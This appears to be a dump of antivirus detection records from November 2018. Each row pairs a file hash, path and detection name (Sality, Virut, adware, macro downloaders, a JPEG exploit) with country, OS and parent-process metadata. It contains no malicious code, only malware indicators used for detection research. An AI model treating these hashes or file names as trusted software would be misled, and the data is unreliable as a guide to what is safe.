  Row(detection=Row(filename='updatus.17175618_runasuser.exe', filepath='C:\\ProgramData\\NVIDIA\\Updatus\\Download\\5424\\updatus.17175618_RUNASUSER.exe', filesize=424000, name='W32/Sality.AT.#M1.#R1'), hash='11c354d74467691a2aab9413de32898977302639ea2def28d4745022c8c258eb', metadata=Row(cmdline='startupshow', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malware Crusher\\mcr.exe', parentsize=3896168, timestamp='2018-11-04T13:33:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yamgeneric001.exe', filepath='\\\\?\\C:\\Windows\\yamgeneric001.exe', filesize=3840000, name='SPR/BitCoin.R.17.#M1.#R1'), hash='123ddc718d5557233de61371644f83948c59c12e897ff58dec883c64e22aaf3b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:21:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='coreldraw graphics suite x7 multilanguage.(incomplete).rar', filepath='\\\\?\\C:\\Users\\X\\Documents\\Usenet.nl\\Virus_X7 Graphics Suite Coreldraw Corel (2014) Build Corelcad - x86x64\\CorelDRAW Graphics Suite X7 Multilanguage.(incomplete).rar', filesize=30336000, name='TR/Dropper.MSIL.Gen4.#M300.#R301027'), hash='124d115f3cddbbd1b4b5b4ba4c0da662c9357deb55ed7fa78448f0f1b9b36654', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:19:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192641-89bc26ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8121bda9\\AVSCAN-20181104-191248-159A46FF\\AVSCAN-20181104-192641-89BC26AC', filesize=512000, name='Adware/Elex.njjta.#M1.#R1'), hash='1294817883d4f043f82d7762fb29805f6f55a8bab3b804fd15a2cb4a3e415a04', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:26:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1728000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='12cb1fe75a7d0120749b71938420fe4b62b6beb8dc037e20cbaa100edd3c0755', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T12:35:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a42f4c907fb82c7d8dd2d208aa53fb501c682ad2', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a42f4c907fb82c7d8dd2d208aa53fb501c682ad2', filesize=6592000, name='TR/Patched.Gen.#M300.#R3369'), hash='13690b0174da8d1771875e8f06e781fcd7a3dfecee206b8b119bd9baddcfb151', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:13:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mediaespresso.exe', filepath='C:\\Program Files (x86)\\CyberLink\\PowerDVD15\\MediaEspresso\\MediaEspresso.exe', filesize=360000, name='W32/Sality.AT.#M1.#R1'), hash='14b11b2c26bc0106392ad0794283fce71961a7cad7868e3d383406c7151191e9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EymrxCnT1kW3qYt0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T23:31:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='00002665.exe', filepath='\\\\?\\D:\\KDR\\exe\\00002665.exe', filesize=320000, name='TR/Crypt.XPACK.Gen.#M300.#R2936'), hash='14b206fdd747f2368fe61789340b539ec3c831f9fd0346e17eff2ba3827b47ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:43:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a182_calc.exe', filepath='c:\\program files\\ansys inc\\a182_calc.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='14b7bae82b46bf77ea72bf863cc4a9a8dca99883fbb31e7de8c66604e371ff09', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-04T14:57:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212457-608488c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01434177\\AVSCAN-20181104-210731-0BCFB3D0\\AVSCAN-20181104-212457-608488C3', filesize=1280000, name='TR/KBDMai.osieo.#M1.#R1'), hash='14ec18fb32c8b2e34cde9b71d67c5b456ed28f9d8b63d5d343ea085e1e21977b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imgtool.exe', filepath='\\\\?\\D:\\العاب\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\GtaViceCity\\gta زياد\\imgtool20\\IMGTool.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='14f04eace19df3ba8d1b15419f2a5e692bb278f532c264e1b59bb23b60b57611', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:30:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imgtool.exe', filepath='D:\\العاب\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\GtaViceCity\\gta زياد\\imgtool20\\IMGTool.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='14f04eace19df3ba8d1b15419f2a5e692bb278f532c264e1b59bb23b60b57611', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:KDC+9jmoeEGnhH1S.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T18:28:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gardeningenthusiast-ttab02-2ac3e9e9cf35202ad2827766ceade26b.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181102-Tooltab\\GardeningEnthusiast-TTAB02-2AC3E9E9CF35202AD2827766CEADE26B.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='152da9afd217d12b308a9ea213795cd2c3ea4636b4796140ee8177e744966031', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-04T04:27:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103055-192d4bd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c47796\\AVSCAN-20181104-102934-0C7BA5F0\\AVSCAN-20181104-103055-192D4BD0', filesize=4448000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='1575f3c31ed0d3882399cdf5a4581893bd9797d09d6d0f0c55a9d16d2ca44c96', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103112-1dafb29d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c47796\\AVSCAN-20181104-102934-0C7BA5F0\\AVSCAN-20181104-103112-1DAFB29D', filesize=4448000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='1575f3c31ed0d3882399cdf5a4581893bd9797d09d6d0f0c55a9d16d2ca44c96', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f5e285faada5a54c4f3630bb1c2ccb1ccbd8ebd8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\f5e285faada5a54c4f3630bb1c2ccb1ccbd8ebd8', filesize=320000, name='Adware/DealPly.159e9a.#M1.#R1'), hash='159e9ab107a20c0d2edb80dd825afaecb69860e7797b219ac1e8225cb6e1a455', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:46:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142629-1d894236', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8069b819\\AVSCAN-20181104-141728-D86AA7D4\\AVSCAN-20181104-142629-1D894236', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110417-7e9f6857', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4dd6150\\AVSCAN-20181104-110004-6593C7B9\\AVSCAN-20181104-110417-7E9F6857', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='黑沙特工m(台版普通版)2018-10-16_135746.apk', filepath='\\\\?\\C:\\Users\\X\\Downloads\\黑沙特工M(台版普通版)2018-10-16_135746.apk', filesize=11792000, name='Adware/ANDR.CyFin.B.Gen.#M1.#R1'), hash='171d70b16abbbb05cd6cfaff382fe316cde982a2a938ad079464404cf382f449', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:57:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='78359a1b4529c319b2cae7e8feb461ae.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_795866800\\78359a1b4529c319b2cae7e8feb461ae.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='174cff58c154169683aa86b66b2118b6f6d879af8dee8dcd4a4d153e2bebb416', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T22:35:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='alienshooter.exe', filepath='E:\\العاب\\Alien Shooter\\AlienShooter.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='1758d8dab8946ca04a861877e9821b4e89b41bc340e549bc412193b502057933', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T21:08:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000d44e', filepath='C:\\Windows\\Temp\\0051dda5-b79b-4f6d-87af-ca7d7e5d893c\\tmp0000057b\\tmp0000d44e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='18323cac6d3330283a32095d084a52b9d252840965517c54b1c9a6969bed9c3f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:03:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gpusniffer.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Audition CS6\\GPUSniffer.exe', filesize=100000, name='W32/Sality.AT.#M1.#R1'), hash='194728e585494a63ef409177dd1058087fedabc08a76dfe6fc6f74cf585a65ba', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:p0ptgrdLEkqKYPtp.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:11:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4deb0cea9115d1f2a68119a8106f6ee48d518c03', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4deb0cea9115d1f2a68119a8106f6ee48d518c03', filesize=320000, name='Adware/DealPly.195b3f.#M1.#R1'), hash='195b3f33a2d60f82585998ed65041c2502d68605c40ace3254fc4c9080943aac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='abd1d58e8ee812d7e64c49905a511315a2470ff0', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\abd1d58e8ee812d7e64c49905a511315a2470ff0', filesize=320000, name='Adware/DealPly.196e8f.#M1.#R1'), hash='196e8f88420f9401f3192cfa7a214d19d4c1dbc8715ec51261bff5737f5b48db', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:10:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001763.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{380D42AC-7531-4738-9953-A56FA241C116}\\RP1\\A0001763.exe', filesize=896000, name='W32/Sality.Y.#M1.#R1'), hash='197b3537db772a3efc4b9884b6e9ad67a6f963f8f359f3652ff873e0f61ae166', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:20:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0.exe', filepath='G:\\العـــاب11\\Roads Of Fantasy\\0.exe', filesize=1792000, name='W32/Virut.Gen.#M1.#R1'), hash='19870d3ff8c7f57e9ab5938d7bb0dd14e43a4f24a6463702cb9a7a856b880478', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T14:40:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190452-bf8ff0c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b809c41\\AVSCAN-20181104-190347-B79916EA\\AVSCAN-20181104-190452-BF8FF0C3', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='19a1b8c64f5c4aafbdbe32bd44a26bc32c9ad589100579799c772448564b959b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:04:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='511e5e2a1f74aabb0d784f79be400b829407820b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\511e5e2a1f74aabb0d784f79be400b829407820b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='19fed12057a16bbbb69cb89bbf876c9756bb53b6765c41c9d44d4084d5840a56', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='511e5e2a1f74aabb0d784f79be400b829407820b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\511e5e2a1f74aabb0d784f79be400b829407820b', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='19fed12057a16bbbb69cb89bbf876c9756bb53b6765c41c9d44d4084d5840a56', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:00:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215717-7e619c32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215717-7E619C32', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='getdatantfs.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATANTFS.exe', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gimp installer.exe', filepath='C:\\Users\\X\\Downloads\\Gimp Installer.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1a54c7cfacec51ef13741b2bc01af7bd7edd66edf1e7386ec30c4c9cd48feca9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:36:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193645-9b913d39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c05ae1e7\\AVSCAN-20181104-193621-966D019E\\AVSCAN-20181104-193645-9B913D39', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1a54c7cfacec51ef13741b2bc01af7bd7edd66edf1e7386ec30c4c9cd48feca9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mobsync.exe', filepath='C:\\WINDOWS\\system32\\mobsync.exe', filesize=384000, name='W32/Infector.Gen8.#M300.#R700734'), hash='1a5e407ab6a036348811c989b1939740f829b3d14ececa5c06eede67f9269e8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1744000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1a6cd78ca59a400ec59e5f17a9fc2c9699fa3322a8d6ad0542757bedadac8507', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T22:28:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bg.js', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Alte Firefox-Daten\\rpt2jo1g.default\\extensions\\iu1@uZir3gkI.com\\content\\bg.js', filesize=32000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='1ad52e8aba705849071528eea3cb7d3c5e543c18db0d4dd0ff1c1e8daec0a7bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:34:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hh515-024-16.xls', filepath='C:\\Users\\X\\Desktop\\LIMPIEZA ESCRITORIO\\Nueva carpeta (4)\\RESTORED\\2017-09-15_10-26-14\\HH515-024-16.XLS', filesize=192000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='1bc182f69c54e17136f57733ac8cd0c0d5b723a84de94bdaa717e6d1b87be390', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T15:53:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125537-87b85e12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa2ab393\\AVSCAN-20181104-125413-7D68E77C\\AVSCAN-20181104-125537-87B85E12', filesize=192000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='1bc182f69c54e17136f57733ac8cd0c0d5b723a84de94bdaa717e6d1b87be390', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:55:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='csupdate.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\acad2014 32bits\\x86\\RC2014\\Program Files\\Autodesk\\Autodesk ReCap\\csupdate.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='1c5848b14bc8ebb210f05417a14347591e0dc3b600a10a1afa49ad049f05a020', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:27:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patch.exe', filepath='c:\\program files (x86)\\vso\\vso downloader\\5\\patch.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='1c70e47c5dcda1d5bba2698c8380c187376ca5d49950e4feea766d1c430432c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T13:10:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141050-c8666738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_deb5c3d0\\AVSCAN-20181104-141030-C5C3CE21\\AVSCAN-20181104-141050-C8666738', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='1c70e47c5dcda1d5bba2698c8380c187376ca5d49950e4feea766d1c430432c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patch.exe', filepath='c:\\program files (x86)\\vso\\vso downloader\\5\\patch.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='1c70e47c5dcda1d5bba2698c8380c187376ca5d49950e4feea766d1c430432c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T13:17:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055723-51b8e3b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055723-51B8E3B1', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055848-59f05c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055848-59F05C3A', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:58:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='epsdnavisrv.exe', filepath='C:\\Program Files\\EPSON Software\\Download Navigator\\EPSDNAVISrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:45:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055841-594f18bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055841-594F18BC', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:58:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055500-43db8c48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055500-43DB8C48', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:02Z'), dt=datetime.date(2018, 11, 4)),
